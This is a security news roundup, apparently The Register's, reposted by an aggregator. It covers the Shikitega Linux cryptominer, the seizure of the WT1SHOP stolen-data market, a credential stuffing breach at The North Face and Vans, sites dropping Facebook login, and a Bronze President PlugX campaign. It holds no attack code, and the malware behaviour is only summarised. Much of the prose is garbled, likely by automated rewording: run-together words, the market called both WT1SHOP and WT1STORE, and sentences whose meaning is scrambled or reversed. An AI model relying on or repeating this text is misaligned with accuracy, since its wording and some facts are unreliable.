Shape-shifting cryptominer wreaking havoc on Linux endpoints and IoT • The Register

Shortly AT&T cybersecurity researchers have discovered sneaky malware targeting Linux endpoints and IoT devices in hopes of gaining persistent access and turning victims into crypto-mining drones.

The malware was”Shikitega” for extensive use of the popular Shikata Ga Nai polymorphic encoder, which allows the malware to “mutate” its code to avoid detection. Shikitega changes its code each time it goes through one of several decoding loops, one of which AT&T said each delivers multiple attacks, starting with an ELF file that’s only 370 bytes in size.

Shikitega also downloads Mettle, a metasploit interpreter that gives the attacker the ability to control connected webcams and that includes a sniffer, multiple reverse shells, process control, shell command execution, and additional abilities to control the affected system.

AT&T didn’t say how the initial infection came about, but it did say Shikitega exploits two Linux vulnerabilities released in 2021 to achieve its ultimate goal, which AT&T said appears to be to install and run the XMRig cryptocurrency miner.

The final stage also establishes persistence, which Shikitega does by downloading and running five shell scripts that configure a pair of cron jobs for the current user and a pair for the root user with crontab that it can also install , if it is not available.

Shikitega also uses cloud hosting solutions to store parts of its payload, which it further uses to obfuscate itself by contacting by IP address instead of domain name. “Without [a] domain names, it is difficult to provide a complete list of detection indicators because they are volatile and are used for legitimate purposes in a short period of time,” AT&T said.

Conclusion: Shikitega is a nasty piece of code. AT&T recommends Linux endpoint and IoT device managers install security patches, keep EDR software up to date, and regularly back up critical systems.

US and Portuguese authorities shut down stolen online data market

A joint operation between Portuguese and US authorities has led to the seizure of WT1SHOP, an online marketplace selling nearly six million sets of stolen credentials and personally identifiable information (PII).

In an announcement by the Justice Department the seizureThe US Attorney for the District of Maryland said Portuguese authorities seized the website, while US law enforcement shut down four domains used by WT1STORE: two .net addresses, a .cc domain and a .com.

An online search revealed that a Russian-based version of the site still appears to be online, although it is unknown if it is still operational.

In the announcement, the DoJ said WT1STORE contained approximately 25,000 scanned driver’s licenses and passports, 1.7 million sets of credentials from various websites, 108,000 bank accounts and 21,800 credit cards.

Not only did WT1STORE have an impressive range of data for sale, it was growing rapidly. The DoJ said that as of June 2020, the site had about 60,823 registered users and 91 sellers and had sold about 2.4 million credentials, earning it about $4 million. As of December 2021, the site had 106,273 users, 94 sellers, and the aforementioned millions of PII.

The DoJ also opened its criminal complaint against alleged WT1SHOP operator and Moldovan citizen Nicolai Colesnicov, who was charged with conspiracy and trafficking in unauthorized access devices. If convicted, Colesnicov faces ten years in prison.

Law enforcement agencies were able to determine that Colesnicov was the likely culprit behind the site by tracking bitcoin sales made on the site and payments sent to web hosts and accounts linked to it.

The DoJ did not say in the announcement whether it knew Colesnicov’s whereabouts or whether authorities had arrested him. If he is in his home country, the US might have trouble catching him as Moldova does not have an extradition treaty with the US.

Credential stuffing avalanche at The North Face brings 200,000 records online

Popular adventure apparel brand The North Face and footwear maker Vans, subsidiaries of the same parent company, have authorized (PDF) on a credential stuffing attack that charged its attacker 194,905 users worth of PII.

Almost all of the PII stored on the two websites was compromised, with the exception of credit card numbers, which the brands’ parent company, VF Outdoors, says it doesn’t store on its websites. Aside from that one bright spot, thieves made off with data like billing and shipping addresses, email addresses, full names and dates of birth, phone numbers, and more—a gift for identity thieves.

Credential stuffing uses previously obtained account credentials (such as those sold by WT1STORE) to fraudulently log into the compromised accounts. Reasons can vary, from gaining insider access to secured systems to stealing additional personal information for use in future crimes or for sale online.

According to VF, the company has disabled passwords and deleted payment card tokens. Users affected by the breach will be forced to create new passwords and re-enter payment information. VF hasn’t said if it blocked the attacker’s access, which may not be reassuring to those looking for confirmation they’re safe going forward.

As already in past credential stuffing attacksthe data used to break into The North Face and Vans accounts may not have been stolen by VF, which the company is reminding users to take into account when setting a new password.

“If a breach occurs on… other websites, an attacker could use your email address and password to access your account [with us]’ the company said in letters to affected users.

Facebook login buttons are disappearing from the internet

The near-ubiquitous Facebook login buttons on third-party sites are gradually disappearing, with brands like Dell, Best Buy, Ford Motor Company, Nike, Twitch, Patagonia, and others all recently removing this option.

According to CNBCwhile Facebook users used to enjoy the option of not having to create a new account on participating sites, the scandal-plagued social media giant was lose userswho become suspicious of allegations about what they share with Meta’s brands data breaches.

Identity management company LoginRadius CEO Rakesh Soni told CNBC that scandals like Facebook have taught users more about what Facebook is doing with their data Cambridge Analyticathey are mad at the site and don’t want to give her access to online activity beyond what she already knows.

Dell CIO Jen Felch told CNBC that these concerns have led to a decline in customers using social logins, which she says suggests that “people are making the decision to isolate that social media account, instead of having other connections to him”.

“We were really just looking at how many people were choosing to sign in with their social media identity, and that’s changed over time,” Felch said. According to CNBC, Dell still has an option on its websites to sign in with a Google account because it’s the only option with significant engagement.

CNBC said Dell first removed the Facebook login option about a month ago, and Meta doesn’t appear to have commented on the change or its importance to the company’s bottom line since.

When Apple announced app tracking transparency, which would require giving users an opt-in option for tracking, Meta expressed concerns that the move would impact the company’s profits. After less than a year of availability, social media companies including Facebook had lost a collective 10 billion dollars of advertising revenue.

Bronze President (not this one) attacks EMEA, South America

A malware campaign discovered by researchers at the Secureworks Counter Threat Unit (CTU) suggests that the suspected Chinese state-sponsored hacking group Bronze President may have new targets in Europe, the Middle East and South America.

The attack was found to have targeted government officials in the three regions. said CTU The structure of the attack is similar to Bronze President’s previous campaigns and fits his modus operandi of launching politically relevant attacks against government officials.

The malware campaign analyzed by CTU focused on the PlugX Malware, a remote access trojan used by a number of government-sponsored hacking groups. CTU said the attack was not particularly sophisticated, relying on phishing and tricking targets into clicking on a malicious RAR file to run the PlugX payload.

Based on the directory structure of the RAR file used in the attack, CTU said it is likely being distributed through phishing emails. Once the victim opens the RAR file and clicks on an LNK file disguised as a document, the malware gets to work by embedding an easily hijacked DLL file into the target’s system, which uses it to introduce additional payloads .

The bronze president has traditionally launched attacks against China’s neighbors such as Myanmar and Vietnam, but CTU said the group had “demonstrated an ability to quickly seek new intelligence-gathering opportunities.”

Case in point: The Bronze President moved earlier this year when Russia invaded Ukraine and managed to install malware on systems owned by Russian officials.

Secureworks also discovered this earlier campaign, which points to changing intelligence gathering strategies in different countries.

“The war in Ukraine has prompted many countries to use their cyber skills to gain insight into global events, political machinations and motivations. This desire for situational awareness often extends to gathering intelligence from allies and ‘friends,'” CTU said. ®

https://www.theregister.com/2022/09/10/in_brief_security/ Shape-shifting cryptominer wreaking havoc on Linux endpoints and IoT • The Register

Laura Coffey

World Time Todays is an automatic aggregator of the all world’s media. In each content, the hyperlink to the primary source is specified. All trademarks belong to their rightful owners, all materials to their authors. If you are the owner of the content and do not want us to publish your materials, please contact us by email – admin@worldtimetodays.com. The content will be deleted within 24 hours.

Related Articles

Back to top button